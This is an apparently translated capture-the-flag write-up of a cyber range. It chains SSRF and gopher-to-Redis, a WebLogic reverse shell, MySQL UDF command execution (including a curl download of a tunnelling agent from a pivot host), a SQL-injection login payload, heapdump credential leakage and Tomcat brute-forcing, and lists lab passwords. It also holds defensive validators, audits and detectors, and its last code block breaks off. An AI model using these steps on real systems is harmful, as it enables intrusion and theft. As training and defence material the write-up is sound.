
成都愚安科技 Cyber Range

Introduction

  • Time taken: about two days

Port scan

$ nmap -sT -p- --min-rate 1000 146.56.239.110
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 00:39 CST
Nmap scan report for 146.56.239.110
Host is up (0.057s latency).
Not shown: 65525 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
7001/tcp open afs3-callback
8081/tcp open blackice-icecap
8082/tcp open blackice-alerts
8848/tcp open unknown
13306/tcp open unknown
22883/tcp open unknown
58080/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 82.02 seconds

$ nmap -sTCV -p 22,80,6379,7001,8081,8082,8848,13306,22883,58080 --min-rate 1000 146.56.239.110
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 00:41 CST
Nmap scan report for 146.56.239.110
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 96:6c:9c:16:24:02:09:58:33:eb:a8:bd:01:a6:0b:ff (RSA)
| 256 72:da:18:1b:5e:33:f0:ce:bf:56:ad:6b:ee:c7:ce:7c (ECDSA)
|_ 256 c1:55:d8:b4:1d:d3:05:09:51:cd:b0:b0:57:d3:32:7f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hello!
6379/tcp open redis Redis key-value store 4.0.14
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
8081/tcp open http Apache Tomcat 10.1.16
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.1.16
8082/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 6 disallowed entries
| /install/ /data/ /includes/ /languages/ /member/
|_/template/
|_http-title: BEES\xE4\xBC\x81\xE4\xB8\x9A\xE7\xBD\x91\xE7\xAB\x99\xE7\xAE\xA1\xE7\x90\x86\xE7\xB3\xBB\xE7\xBB\x9F_\xE4\xBC\x81\xE4\xB8\x9A\xE5\xBB\xBA\xE7\xAB\x99\xE7\xB3\xBB\xE7\xBB\x9F_\xE5\xA4\x96\xE8\xB4\xB8\xE7\xBD\x91\xE7\xAB\x99\xE5\xBB...
8848/tcp open unknown
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Fri, 08 Dec 2023 16:41:27 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
| Found</h1></body></html>
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Fri, 08 Dec 2023 16:41:27 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
13306/tcp open mysql MySQL 5.7.44
| mysql-info:
| Protocol: 10
| Version: 5.7.44
| Thread ID: 6
| Capabilities flags: 65535
| Some Capabilities: InteractiveClient, SupportsTransactions, SwitchToSSLAfterHandshake, LongPassword, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, Support41Auth, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, ODBCClient, FoundRows, ConnectWithDatabase, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: \x175;=#vXx \x1C\x02Q\x0By3a3(.}
|_ Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.44_Auto_Generated_Server_Certificate
| Not valid before: 2023-12-08T02:40:24
|_Not valid after: 2033-12-05T02:40:24
22883/tcp open unknown
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 500
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 455
| Date: Fri, 08 Dec 2023 16:41:27 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 500
| Internal Server Error</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500
|_ Internal Server Error</h1></body></html>
58080/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 302
| Set-Cookie: JSESSIONID=0EFBAEC932D0C1D65F9345910368D27B; Path=/; HttpOnly
| Location: http://localhost:8080/login;jsessionid=0EFBAEC932D0C1D65F9345910368D27B
| Content-Length: 0
| Date: Fri, 08 Dec 2023 16:41:26 GMT
| Connection: close
| HTTPOptions:
| HTTP/1.1 302
| Set-Cookie: JSESSIONID=6A9313FE260225F7AB12AAC3ECA192A7; Path=/; HttpOnly
| Location: http://localhost:8080/login;jsessionid=6A9313FE260225F7AB12AAC3ECA192A7
| Content-Length: 0
| Date: Fri, 08 Dec 2023 16:41:26 GMT
| Connection: close
| RPCCheck:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Fri, 08 Dec 2023 16:41:26 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
| Request</h1></body></html>
| RTSPRequest:
| HTTP/1.1 505
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 465
| Date: Fri, 08 Dec 2023 16:41:26 GMT
| <!doctype html><html lang="en"><head><title>HTTP Status 505
| HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
|_ HTTP Version Not Supported</h1></body></html>
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

A quick summary of the port scan:

  • 80: an SSRF vulnerability has already been confirmed
  • 6379: Redis; if it can be reached, it could be used to write a webshell or a cron job
  • 7001: Oracle WebLogic Server 10.3.6.0
  • 8081: Tomcat 10.1.16; the manager interface needs credentials, so perhaps a readable configuration file can be tried
  • 8082: a BEES CMS site; worth looking for known historical vulnerabilities
  • 8848: 404
  • 13306: MySQL service
  • 22883: 500
  • 58080: shows a login page directly

Web1

80

Visiting the site, the SSRF vulnerability is obvious at a glance. A little experimenting with URL schemes showed that /etc/passwd could be read. I then looked at a few other useful files, such as /etc/hosts, from which I learned that the host behind port 80 has the IP 172.18.240.5. Following the hints in the challenge I learned an internal network range and enumerated it to see which hosts were alive; I probed ports 80 and 6379 and finally found Redis on 172.18.240.7. Using the gopher scheme against it gives a shell on 172.18.240.7.
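The chain above works because the fetcher on port 80 accepts any URL scheme and any destination. The validator below is an added example written for this page (not code from the original write-up or the range): each hop of the chain is stopped by a different check, the file:// and gopher:// schemes by the scheme allow-list, the 172.18.240.x hosts by the private-range check, and Redis on 6379 by the port allow-list. The hostnames used in the tests are constructed, and the `resolver` parameter is injectable so the example runs offline.

```python
"""Outbound URL validator for a server-side fetcher (added example)."""
import ipaddress
import socket
from typing import Callable, Iterable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
# Loopback, RFC 1918, link-local, CGNAT, "this network" and their IPv6 counterparts.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

Resolver = Callable[[str], Iterable[str]]


def dns_resolver(host: str) -> List[str]:
    """Default resolver: return every address, since the client may connect to any of them."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_blocked_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    # ::ffff:172.18.240.7 is the same host as 172.18.240.7; compare the IPv4 form.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_outbound_url(url: str, resolver: Resolver = dns_resolver) -> Tuple[bool, str]:
    """Return (allowed, reason); the reason names the first check that failed."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal: no DNS needed
    except ValueError:
        addrs = list(resolver(host))                # hostname: check every answer
        if not addrs:
            return False, f"host {host!r} did not resolve"
    for addr in addrs:
        if is_blocked_address(addr):
            return False, f"{host} -> {addr} is in a blocked range"
    return True, "ok"


if __name__ == "__main__":
    for u in ("file:///flag1", "gopher://172.18.240.7:6379/", "http://172.18.240.7/",
              "http://93.184.216.34/"):
        print(u, check_outbound_url(u))
```

Two caveats apply in a real fetcher: the connection must be made to the address that was checked (otherwise a second DNS lookup can return a different answer), and the check has to be repeated for every redirect, since a permitted external host can redirect into the internal range.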

Shell

172.18.240.7

Using the gopher scheme yields a session on host 172.18.240.7.

tip
  • The first flag: read file:///flag1 directly through port 80
  • The second flag is in the cron jobs on 172.18.240.7
  • The third flag is in the root directory on 172.18.240.7

Web2

7001

The service on 7001 is WebLogic and its version is disclosed; after a search I found an exploit script for CVE-2017-10271.

Shell

172.16.10.8/172.25.20.10 (root)

Running the script above gives a reverse shell. From there I uploaded nmap and scanned the internal network, finding one live host, 172.25.20.12. Judging by its name it is a MySQL server, and a port scan showed only 3306 open. This WebLogic instance presumably talks to MySQL, so a MySQL account and password probably exist somewhere on it, and I decided to dig along those lines.

(remote) root@0ff84b81962d:/root# ./nmap -sn  172.16.10.8/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-08 19:32 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.16.10.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000011s latency).
MAC Address: 02:42:23:5F:02:A4 (Unknown)
Nmap scan report for 0ff84b81962d (172.16.10.8)
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.76 seconds
(remote) root@0ff84b81962d:/root# ./nmap -sn 172.25.20.10/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-08 19:32 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.25.20.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000020s latency).
MAC Address: 02:42:21:09:D7:1E (Unknown)
Nmap scan report for 2-mysql_udf-1.2_ntwo (172.25.20.12)
Host is up (0.000010s latency).
MAC Address: 02:42:AC:19:14:0C (Unknown)
Nmap scan report for 0ff84b81962d (172.25.20.10)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.76 seconds
(remote) root@0ff84b81962d:/root# ./nmap -sT -p- --min-rate 1000 172.25.20.12

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-08 19:35 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 2-mysql_udf-1.2_ntwo (172.25.20.12)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00014s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 02:42:AC:19:14:0C (Unknown)

After some searching it was indeed as I had guessed: I found the database account and password, but unfortunately the password was encrypted, and with AES at that [/(ㄒoㄒ)/~~]. After another round of searching and asking around I found the decryption method and obtained the password Meetsec#1024. Time to log in to MySQL.

172.25.20.12/172.26.30.4 (Mysql)

I set up a proxy to reach hosts in 172.25.20.0/24. This gave an interactive MySQL session, but the database held nothing of interest, so the only option left was UDF privilege escalation; see the post MySQL 漏洞利用与提权 (MySQL exploitation and privilege escalation) for the procedure.

MySQL [data]> SELECT … INTO DUMPFILE '/usr/lib64/mysql/plugin/udf64.so';
Query OK, 1 row affected (0.004 sec)

MySQL [data]> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf64.so';
Query OK, 0 rows affected (0.003 sec)

MySQL [data]> select * from mysql.func;
+----------+-----+----------+----------+
| name | ret | dl | type |
+----------+-----+----------+----------+
| sys_eval | 0 | udf64.so | function |
+----------+-----+----------+----------+
1 row in set (0.003 sec)

MySQL [data]> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql |
+--------------------+
1 row in set (0.008 sec)

MySQL [data]> select sys_eval('id');
+-------------------------------------------------+
| sys_eval('id') |
+-------------------------------------------------+
| uid=999(mysql) gid=999(mysql) groups=999(mysql) |
+-------------------------------------------------+
1 row in set (0.007 sec)

MySQL [data]>
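Seen from the database owner's side, everything that made the escalation above possible is visible in three places: the rows of mysql.func, the files in the plugin directory, and the value of secure_file_priv (an empty value is what lets SELECT ... INTO DUMPFILE write into the plugin directory at all). The audit below is an added example, not part of the original write-up or any tool it uses; the sample rows, file metadata and the allow-list of approved libraries are constructed, and names such as `PluginFile` and `APPROVED_UDF_LIBRARIES` are this example's own.

```python
"""Audit of registered MySQL UDFs against the plugin directory (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Libraries the operator has actually approved (constructed allow-list).
APPROVED_UDF_LIBRARIES = {"libmysql_audit_helper.so"}
# Function names exported by the widely used lib_mysqludf_sys kit.
COMMAND_EXEC_UDF_NAMES = {"sys_eval", "sys_exec", "sys_get", "sys_set", "lib_mysqludf_sys_info"}

FuncRow = Tuple[str, int, str, str]   # (name, ret, dl, type), the columns of mysql.func


@dataclass(frozen=True)
class PluginFile:
    name: str
    owner: str    # as `stat -c %U` would report it
    mtime: str    # ISO-8601, constructed


def audit_udfs(func_rows: Sequence[FuncRow], plugin_files: Sequence[PluginFile],
               secure_file_priv: Optional[str], plugin_dir: str) -> List[str]:
    """Return one finding per problem; an empty list means nothing suspicious."""
    findings: List[str] = []
    # NULL (None) disables INTO DUMPFILE entirely; '' allows writing anywhere the
    # server process can, which is what lets a UDF library land in the plugin directory.
    if secure_file_priv == "":
        findings.append("secure_file_priv is empty: INTO DUMPFILE can write into the plugin directory")
    elif secure_file_priv and secure_file_priv.rstrip("/") == plugin_dir.rstrip("/"):
        findings.append("secure_file_priv points at the plugin directory itself")

    files_by_name = {f.name: f for f in plugin_files}
    for name, _ret, dl, _ftype in func_rows:
        if dl not in APPROVED_UDF_LIBRARIES:
            findings.append(f"UDF {name} is loaded from unapproved library {dl}")
        if name in COMMAND_EXEC_UDF_NAMES:
            findings.append(f"UDF {name} has the name of a known command-execution UDF")
        f = files_by_name.get(dl)
        if f is None:
            findings.append(f"library {dl} for UDF {name} is not present in {plugin_dir}")
        elif f.owner == "mysql":
            findings.append(f"library {dl} is owned by the mysql service account "
                            f"(packaged plugins are root-owned); modified {f.mtime}")
    return findings


# Constructed sample mirroring the state after the escalation above.
SAMPLE_FUNC_ROWS: List[FuncRow] = [("sys_eval", 0, "udf64.so", "function")]
SAMPLE_PLUGIN_FILES = [
    PluginFile("auth_socket.so", "root", "2023-11-01T10:00:00"),
    PluginFile("udf64.so", "mysql", "2023-12-09T03:12:40"),
]

if __name__ == "__main__":
    for line in audit_udfs(SAMPLE_FUNC_ROWS, SAMPLE_PLUGIN_FILES, "", "/usr/lib64/mysql/plugin"):
        print("-", line)
```

The corresponding hardening follows from the findings: set secure_file_priv to a dedicated directory (or NULL to disable file writes), keep the plugin directory owned by root and not writable by the mysql account, and alert on any new row in mysql.func.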

Checking that host's /etc/hosts then told me the database host's IP and revealed a new network segment, so it was time to set up a second-level proxy. Using 172.25.20.10 I uploaded linux_x64_agent to 172.25.20.12 and made it executable.

MySQL [data]> select sys_eval('curl http://172.25.20.10:8000/linux_x64_agent -o /tmp/linux_x64_agent');
+-----------------------------------------------------------------------------------+
| sys_eval('curl http://172.25.20.10:8000/linux_x64_agent -o /tmp/linux_x64_agent') |
+-----------------------------------------------------------------------------------+
| NULL |
+-----------------------------------------------------------------------------------+
1 row in set (0.014 sec)

MySQL [data]> select sys_eval('ls /tmp/linux_x64_agent');
+-------------------------------------+
| sys_eval('ls /tmp/linux_x64_agent') |
+-------------------------------------+
| /tmp/linux_x64_agent |
+-------------------------------------+
1 row in set (0.010 sec)

MySQL [data]> select sys_eval('chmod +x /tmp/linux_x64_agent');
+-------------------------------------------+
| sys_eval('chmod +x /tmp/linux_x64_agent') |
+-------------------------------------------+
| NULL |
+-------------------------------------------+
1 row in set (0.009 sec)


172.26.30.11

Scanning the target segment with nmap turned up a new host, 172.26.30.11.

bash-4.2$ ./nmap -sn 172.26.30.4/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-09 11:37 GMT
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.26.30.1
Host is up (0.00019s latency).
Nmap scan report for 917a4a8430cf (172.26.30.4)
Host is up (0.000084s latency).
Nmap scan report for 2-log4j2-1.2_ntwo2 (172.26.30.11)
Host is up (0.000086s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 14.91 seconds

bash-4.2$ ./nmap -sT -p- 172.26.30.11

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-09 11:39 GMT
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 2-log4j2-1.2_ntwo2 (172.26.30.11)
Host is up (0.000092s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
8983/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds

I then set up a proxy and visited this service; the version information is visible there, and a search showed it is affected by the Log4j vulnerability. Some forwarding was needed next: use the MySQL host as a proxy so that the third host's traffic is relayed out through the second host. Unfortunately, for reasons I could not determine, the exploit did not work. Frustrating.

Web3

22883

I ran a directory scan. The first time I attacked this I made no progress at all, because my wordlist simply did not contain the right entries. The scan eventually reveals an actuator directory, which is the unauthenticated Spring Boot actuator exposure. From there /actuator/heapdump can be found as well; downloading it should yield a MySQL account.

[password = MeetSec@2nd!2022, jdbcUrl = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]
Resources

The leaked Spring Boot file can be downloaded from 共享资料/Resources/heapdump.hprof.
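The heap dump above was retrievable because the heapdump endpoint was exposed over HTTP with nothing in front of it. The check below is an added example (not code from the original write-up or the challenge): it reads an application.properties text and reports the management settings that produce that state. The property keys are Spring Boot's documented management.* keys; the two sample configurations, the list of sensitive endpoints and the function names are this example's own.

```python
"""Spring Boot actuator exposure check over an application.properties text (added example)."""
import re
from typing import Dict, List, Set

# Endpoints whose output routinely contains secrets or internals.
SENSITIVE_ENDPOINTS = {"heapdump", "env", "threaddump", "beans", "configprops",
                       "mappings", "loggers", "shutdown"}
# Spring Boot's default for web exposure (older 2.x releases also included info).
DEFAULT_INCLUDE = {"health"}


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal .properties reader: '#'/'!' comments, '=' or ':' separators, no line continuations."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def _csv(value: str) -> Set[str]:
    return {v.strip() for v in value.split(",") if v.strip()}


def check_actuator_exposure(props: Dict[str, str]) -> List[str]:
    findings: List[str] = []
    include = _csv(props.get("management.endpoints.web.exposure.include", "")) or DEFAULT_INCLUDE
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if "*" in include:
        findings.append("management.endpoints.web.exposure.include=* exposes every endpoint over HTTP")
        include = SENSITIVE_ENDPOINTS | DEFAULT_INCLUDE
    exposed = (include & SENSITIVE_ENDPOINTS) - exclude
    for ep in sorted(exposed):
        # A disabled endpoint is removed entirely, so its exposure no longer matters.
        enabled = props.get(f"management.endpoint.{ep}.enabled", "true").lower() != "false"
        if enabled:
            findings.append(f"sensitive endpoint {ep} is exposed over HTTP and enabled")
    if exposed and "management.server.port" not in props:
        findings.append("management endpoints share the application port; a separate "
                        "management.server.port lets the network layer restrict them")
    return findings


# Constructed configurations: the first reproduces the exposure above, the second closes it.
EXPOSED_CONFIG = """
# everything, including heapdump and env, reachable under /actuator
management.endpoints.web.exposure.include=*
"""
HARDENED_CONFIG = """
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=heapdump,env
management.endpoint.heapdump.enabled=false
management.server.port=9090
"""

if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, check_actuator_exposure(parse_properties(cfg)))
```

Exposure settings are only half of it: the actuator paths should also sit behind the application's authentication (Spring Security), and heapdump in particular should stay disabled in production, because a heap dump contains whatever was in memory, the datasource password above included.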

13306

20240518235310

tip
  • The flag is in the database

Web5

8082

Visiting it shows a CMS. My searches turned up a series of vulnerabilities, and from these I picked SQL injection at the admin login, because when I entered the username admin' or 1=1 -- - the error said the user's password was wrong rather than that the user did not exist. So it first checks whether the user exists and only then verifies the password; I therefore built a UNION-based injection and attacked directly, after which the admin interface was accessible. Once in the admin interface, the next step was uploading a webshell for further attacks. Another search turned up a way: when uploading through /admin/upload.php the back end checks only the Content-Type header, so the check can be bypassed completely.

user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dfb2&submit=true&submit.x=17&submit.y=28

Then just visit the corresponding page.
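The two observations that made the login attack work are a concatenated SQL string and two distinguishable error messages. The code below is an added example written for this page (not the CMS's code or anything from the original write-up): `login_vulnerable` reproduces that pattern, so the username admin' or 1=1 -- - from the write-up matches a row and returns the password error instead of the user error, while `login_hardened` binds the parameter, returns one message for both failure causes, and stores a salted PBKDF2 hash instead of an unsalted MD5 (the hash in the write-up's payload, e10adc3949ba59abbe56e057f20f883e, is MD5 of 123456). Account data is constructed and SQLite stands in for MySQL.

```python
"""Admin login: the observed vulnerable pattern beside a hardened version (added example)."""
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(stored: str, password: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


# Verified when no such user exists, so response time does not reveal valid usernames.
DUMMY_HASH = hash_password("not-a-real-password")


def make_demo_db() -> sqlite3.Connection:
    """Constructed accounts: one table in the CMS's unsalted-MD5 style, one hashed properly."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_md5 (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE admin_kdf (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin_md5 VALUES (1, 'admin', ?)",
                 (hashlib.md5(b"correct horse").hexdigest(),))
    conn.execute("INSERT INTO admin_kdf VALUES (1, 'admin', ?)", (hash_password("correct horse"),))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> str:
    # Untrusted input concatenated into SQL: the username can close the string
    # literal and add conditions, so the lookup succeeds for a user that was never named.
    row = conn.execute(f"SELECT password FROM admin_md5 WHERE username = '{username}'").fetchone()
    if row is None:
        return "user does not exist"          # distinct error: confirms which usernames exist
    if row[0] != hashlib.md5(password.encode()).hexdigest():
        return "wrong password"
    return "ok"


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> str:
    # Bound parameter: the driver sends the username as data, never as SQL text.
    row = conn.execute("SELECT password FROM admin_kdf WHERE username = ?", (username,)).fetchone()
    # Always run the verifier, against a dummy hash if needed, so both failures take the same time.
    ok = verify_password(row[0] if row else DUMMY_HASH, password)
    if row is None or not ok:
        return "invalid username or password"   # one message for both failure causes
    return "ok"


if __name__ == "__main__":
    db = make_demo_db()
    for user in ("admin", "nobody", "admin' or 1=1 -- -"):
        print(f"{user!r:24} vulnerable={login_vulnerable(db, user, 'x')!r:22} "
              f"hardened={login_hardened(db, user, 'x')!r}")
```

The separate-message oracle is worth fixing on its own even where the query is already parameterized: it turns a login form into a username enumeration service, which is what a brute-force run against the admin account needs first.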

Shell

172.17.0.2 (www-data)

Starting from the www-data shell obtained above, try to get a reverse shell.

Web6

8081

The service is a Tomcat page. Brute-forcing directly gave the manager account's credentials; uploading a backdoor then gave access.
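A password-guessing run against the manager application leaves an unmistakable trail in Tomcat's access log: a burst of 401 responses for /manager/html from one client, often followed by a 200 once a guess succeeds. The detector below is an added example (not from the original write-up); the log lines are constructed in the default AccessLogValve pattern (`%h %l %u %t "%r" %s %b`), and the threshold and window are this example's own choices.

```python
"""Manager-login brute-force detection over Tomcat access log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines that do not match the pattern."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_bruteforce(lines: Iterable[str], threshold: int = 5,
                              window_seconds: int = 60) -> List[Tuple[str, int, bool]]:
    """Return (client, max 401s inside one window, whether a 2xx/302 followed the last failure)
    for every client with at least `threshold` manager login failures inside `window_seconds`."""
    events: Dict[str, List[Tuple[datetime, int]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"].startswith("/manager/"):
            events[rec["ip"]].append((rec["ts"], rec["status"]))
    hits = []
    for ip, evs in events.items():
        evs.sort()
        fails = [ts for ts, st in evs if st == 401]
        best, j = 0, 0
        for i, ts in enumerate(fails):            # sliding window over sorted failure times
            while (ts - fails[j]).total_seconds() > window_seconds:
                j += 1
            best = max(best, i - j + 1)
        if fails and best >= threshold:
            success_after = any(st in (200, 302) and ts > fails[-1] for ts, st in evs)
            hits.append((ip, best, success_after))
    return sorted(hits)


# Constructed sample: one guessing burst that succeeds, one operator typo, unrelated traffic.
SAMPLE_LOG = """\
10.0.0.3 - - [09/Dec/2023:00:04:58 +0800] "GET / HTTP/1.1" 200 11230
203.0.113.9 - - [09/Dec/2023:00:05:01 +0800] "GET /manager/html HTTP/1.1" 401 2536
203.0.113.9 - - [09/Dec/2023:00:05:03 +0800] "GET /manager/html HTTP/1.1" 401 2536
203.0.113.9 - - [09/Dec/2023:00:05:05 +0800] "GET /manager/html HTTP/1.1" 401 2536
203.0.113.9 - - [09/Dec/2023:00:05:07 +0800] "GET /manager/html HTTP/1.1" 401 2536
203.0.113.9 - - [09/Dec/2023:00:05:09 +0800] "GET /manager/html HTTP/1.1" 401 2536
203.0.113.9 - - [09/Dec/2023:00:05:11 +0800] "GET /manager/html HTTP/1.1" 401 2536
203.0.113.9 tomcat - [09/Dec/2023:00:05:14 +0800] "GET /manager/html HTTP/1.1" 200 19873
198.51.100.4 - - [09/Dec/2023:00:06:00 +0800] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.4 admin - [09/Dec/2023:00:06:20 +0800] "GET /manager/html HTTP/1.1" 200 19873
"""

if __name__ == "__main__":
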